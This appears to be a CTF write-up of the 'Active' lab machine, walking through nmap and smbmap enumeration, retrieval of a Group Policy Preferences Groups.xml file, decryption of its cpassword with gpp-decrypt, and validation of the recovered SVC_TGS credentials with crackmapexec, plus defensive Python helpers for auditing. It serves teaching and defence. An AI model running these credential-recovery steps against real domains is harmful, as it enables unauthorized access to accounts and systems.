Active [EASY 🟢]

Difficulty: Easy

1- Reconnaissance and scanning

1.1 Ping

PING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=127 time=185 ms

--- 10.10.10.100 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 184.783/184.783/184.783/0.000 ms

We can tell this is a Windows machine from the TTL (the usual default initial values are 64 on Linux and 128 on Windows, and each router hop decrements the value by one, so 127 points to a Windows host one hop away):

TTL <= 64  >> (Linux)
TTL <= 128 >> (Windows)
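As an added example (not part of the original write-up), the helper below turns the TTL field of a ping reply into the same inference the text makes, plus an estimate of how many hops away the host is. The defaults table (64, 128, 255) and the sample reply line are assumptions chosen by the editor; the heuristic is only a hint, since administrators can change the default TTL and NAT or VPN hops shift the observed value.

```python
import re

# Added example, not part of the original write-up: infer the sender's OS
# family and hop distance from the TTL observed in a ping reply.
# Assumed default initial TTLs (editor's table, the common vendor defaults).
DEFAULT_TTLS = {
    64: "Linux/Unix",
    128: "Windows",
    255: "Network device / Solaris",
}

# Constructed sample: a reply line in the format ping prints.
SAMPLE_REPLY = "64 bytes from 10.10.10.100: icmp_seq=1 ttl=127 time=185 ms"

TTL_RE = re.compile(r"\bttl=(\d+)\b")


def parse_ping_ttl(reply_line):
    """Extract the TTL field from one ping reply line, or None if absent."""
    match = TTL_RE.search(reply_line)
    return int(match.group(1)) if match else None


def guess_os_from_ttl(observed_ttl):
    """Return (initial_ttl, hops, os_family) for an observed TTL.

    The smallest common default that is >= the observed value is taken as the
    sender's initial TTL; the difference is the number of routers crossed.
    """
    if not 0 < observed_ttl <= 255:
        raise ValueError("TTL must be between 1 and 255")
    for initial in sorted(DEFAULT_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, DEFAULT_TTLS[initial]
    raise AssertionError("unreachable: 255 covers every valid TTL")


def classify_reply(reply_line):
    """Parse a ping reply and return a one-line human-readable verdict."""
    ttl = parse_ping_ttl(reply_line)
    if ttl is None:
        return "no TTL field found"
    initial, hops, family = guess_os_from_ttl(ttl)
    return f"ttl={ttl}: likely {family} (default {initial}, ~{hops} hop(s) away)"


if __name__ == "__main__":
    print(classify_reply(SAMPLE_REPLY))
```

Run it as a script to see the verdict for the sample line; the functions can also be imported and fed lines read from a real ping run.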

1.2 Nmap

❯ nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.100 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-23 19:26 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:26
Completed Parallel DNS resolution of 1 host. at 19:26, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:26
Scanning 10.10.10.100 [65535 ports]
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 49168/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 47001/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Completed SYN Stealth Scan at 19:27, 15.72s elapsed (65535 total ports)
Initiating Service scan at 19:27
Scanning 23 services on 10.10.10.100
Service scan Timing: About 65.22% done; ETC: 19:28 (0:00:30 remaining)
Completed Service scan at 19:28, 61.62s elapsed (23 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 9.57s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 8.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.17s latency).
Scanned at 2025-02-23 19:26:57 -03 for 96s
Not shown: 65487 closed tcp ports (reset), 25 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-23T22:28:22
|_  start_date: 2025-02-22T11:34:26
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: 1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 36443/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38631/udp): CLEAN (Timeout)
|   Check 4 (port 15484/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.51 seconds
           Raw packets sent: 76846 (3.381MB) | Rcvd: 71716 (2.869MB)

This machine is an Active Directory environment; we also see several interesting ports:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

The machine is running Windows Server 2008 R2 SP1 and has the DNS server active (port 53); from the scan we learn the domain name "active.htb".

So that the IP resolves to the domain, we edit the "/etc/hosts" file with Vim, so that it ends up as:

We can also see port 445 (microsoft-ds?), which is an SMB server, and port 47001, which is a web server (Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)).
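The same reading of the scan can be automated. The following is an added example, not code from the original write-up: it parses the open-port lines of an nmap -oN report, pulls the domain name out of the LDAP banner, and flags the service combination (Kerberos plus LDAP) that identifies a domain controller, which is useful for an auditor checking what a DC exposes to a network segment. The port-to-role table is the editor's assumption based on the standard AD defaults; the sample lines are copied from the scan above.

```python
import re

# Added example, not part of the original write-up: summarise an nmap -oN
# report and flag the service set that identifies an AD domain controller.
SAMPLE_NMAP = """\
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
"""

# Editor's assumption: ports a domain controller normally listens on.
DC_ROLES = {
    53: "DNS",
    88: "Kerberos",
    389: "LDAP",
    445: "SMB (SYSVOL/NETLOGON)",
    464: "Kerberos password change",
    636: "LDAPS",
    3268: "Global Catalog",
    3269: "Global Catalog over TLS",
}

# Matches "<port>/tcp  open  <service> <rest>"; the reason column is optional.
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
DOMAIN_RE = re.compile(r"Domain:\s*([A-Za-z0-9.-]+)")


def parse_open_ports(report):
    """Return {port: service} for every open TCP line in an nmap -oN report."""
    ports = {}
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports[int(m.group(1))] = m.group(2)
    return ports


def find_domain(report):
    """Return the AD domain name nmap printed in an LDAP banner, or None."""
    m = DOMAIN_RE.search(report)
    return m.group(1) if m else None


def summarize_dc_exposure(report):
    """Summarise which DC roles the host exposes and whether it looks like a DC."""
    ports = parse_open_ports(report)
    roles = {p: DC_ROLES[p] for p in sorted(ports) if p in DC_ROLES}
    # Kerberos together with LDAP or LDAPS is the strong DC signal.
    looks_like_dc = 88 in roles and (389 in roles or 636 in roles)
    return {
        "domain": find_domain(report),
        "open_ports": sorted(ports),
        "dc_roles": roles,
        "looks_like_dc": looks_like_dc,
    }


if __name__ == "__main__":
    for key, value in summarize_dc_exposure(SAMPLE_NMAP).items():
        print(f"{key}: {value}")
```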

1.3 crackmapexec

❯ crackmapexec smb 10.10.10.100
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)

1.4 smbmap

smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	

2- Exploitation

2.1 Exploitation via SMB

Looking at the smbmap scan that lists the SMB shares, we have read access to the "Replication" share; let's see what is inside it:

smbmap -H 10.10.10.100 -r Replication
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replication
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	active.htb
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections 

There is a directory named "active.htb"; let's list it to see what is inside:

smbmap -H 10.10.10.100 -r Replication/active.htb
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	DfsrPrivate
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Policies
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	scripts
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections 

There are 3 directories; after some investigation, the only directory where we can find valuable information is "Policies", so let's list it:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	{6AC1786C-016F-11D2-945F-00C04fB984F9}
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

We see 2 directories; the one of interest is "{31B2F340-016D-11D2-945F-00C04FB984F9}".

Let's see what is inside the directory:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	fr--r--r--               23 Sat Jul 21 07:38:11 2018	GPT.INI
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Group Policy
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	MACHINE
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	USER
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections 

Let's list the "MACHINE" directory:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Microsoft
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Preferences
	fr--r--r--             2788 Sat Jul 21 07:38:11 2018	Registry.pol
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Now let's list the "Preferences" directory:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Groups
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Finally, let's list the "Groups" directory:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	fr--r--r--              533 Sat Jul 21 07:38:11 2018	Groups.xml
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections 

There is a file with an XML extension; let's download it with the following command:

smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

We run it:

❯ smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
[*] Closed 1 connections 

The file is saved under a name built from the path we followed inside the share, so let's rename it:

❯ mv 10.10.10.100-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml Groups.xml
❯ ls
crackmapexec.txt  escaneo.txt  Groups.xml  ping.txt  smbmap.txt

Let's view the file contents:

❯ cat Groups.xml
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: Groups.xml
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <?xml version="1.0" encoding="utf-8"?>
   2   │ <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
       │  uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbC
       │ pZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
   3   │ </Groups>
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

There are possible credentials inside this XML file:

userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

The password is encrypted; let's decrypt it. The cpassword attribute of Group Policy Preferences is AES-encrypted with a fixed key that Microsoft itself published, which is why it can be recovered by anyone who can read the file.

To decrypt it we use the Kali tool called "gpp-decrypt" with the following command:

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

We run it:

❯ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

So the username and password are as follows:

userName="active.htb\SVC_TGS"
cpassword="GPPstillStandingStrong2k18"

Let's remove the "active.htb" domain from the userName:

userName="SVC_TGS"
cpassword="GPPstillStandingStrong2k18"
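From the defensive side, the lesson of this share is that a stored cpassword anywhere under SYSVOL is a domain-wide credential leak. The following is an added example, not code from the original write-up: an audit helper that parses Group Policy Preference XML files and reports every element that still carries a cpassword attribute, together with the account it applies to. It only reports, it does not decrypt. The first sample is the Groups.xml recovered above (reassembled without the line wrapping the pager introduced); the second is a constructed clean file; the SYSVOL paths in the usage are placeholders.

```python
import xml.etree.ElementTree as ET

# Added example, not part of the original write-up: audit GPP XML files for
# stored cpassword attributes.
# Sample 1: the Groups.xml found on the Replication share (content from the
# write-up above).
GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" '
    'image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">'
    '<Properties action="U" newName="" fullName="" description="" '
    'cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" '
    'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>'
    '</User></Groups>'
)

# Sample 2 (constructed): same layout, no password attribute at all.
CLEAN_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="example\\svc_backup">'
    '<Properties action="U" userName="example\\svc_backup" acctDisabled="1"/>'
    '</User></Groups>'
)


def find_cpasswords(xml_text):
    """Return one finding per element carrying a cpassword attribute.

    A finding records the GPP element type (User, ScheduledTask, Service, ...),
    the account it applies to and whether the attribute is non-empty. A file
    that is not well-formed XML yields a single parse_error finding so the
    audit never silently skips it.
    """
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError as exc:
        return [{"element": None, "account": None, "has_password": False,
                 "parse_error": str(exc)}]
    # ElementTree has no parent pointers; build the map once.
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        parent = parents.get(elem)
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("runAs")
                   or (parent.attrib.get("name") if parent is not None else None))
        findings.append({
            "element": parent.tag if parent is not None else elem.tag,
            "account": account,
            "has_password": bool(elem.attrib["cpassword"]),
            "parse_error": None,
        })
    return findings


def audit_sysvol(files):
    """Audit a {path: xml_text} mapping and keep only the risky findings."""
    report = []
    for path, text in files.items():
        for finding in find_cpasswords(text):
            if finding["has_password"] or finding["parse_error"]:
                report.append(dict(finding, path=path))
    return report


if __name__ == "__main__":
    # Placeholder paths: in practice walk the Policies tree under SYSVOL.
    sample = {"SYSVOL/<domain>/Policies/<GUID>/MACHINE/Preferences/Groups/Groups.xml": GROUPS_XML,
              "SYSVOL/<domain>/Policies/<other-GUID>/MACHINE/Preferences/Groups/Groups.xml": CLEAN_XML}
    for finding in audit_sysvol(sample):
        print(finding["path"], "->", finding["element"], finding["account"])
```

The remediation for a hit is to delete the preference item (or recreate it without a stored password) and rotate the affected account, since the file has been readable by every domain member while it existed.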

We now have the credentials; let's check whether they are valid with crackmapexec, using the following command:

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

We run it:

❯ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 

Now let's see what permissions we have on the shares with the credentials we obtained, using the following command:

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares

We run it:

❯ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
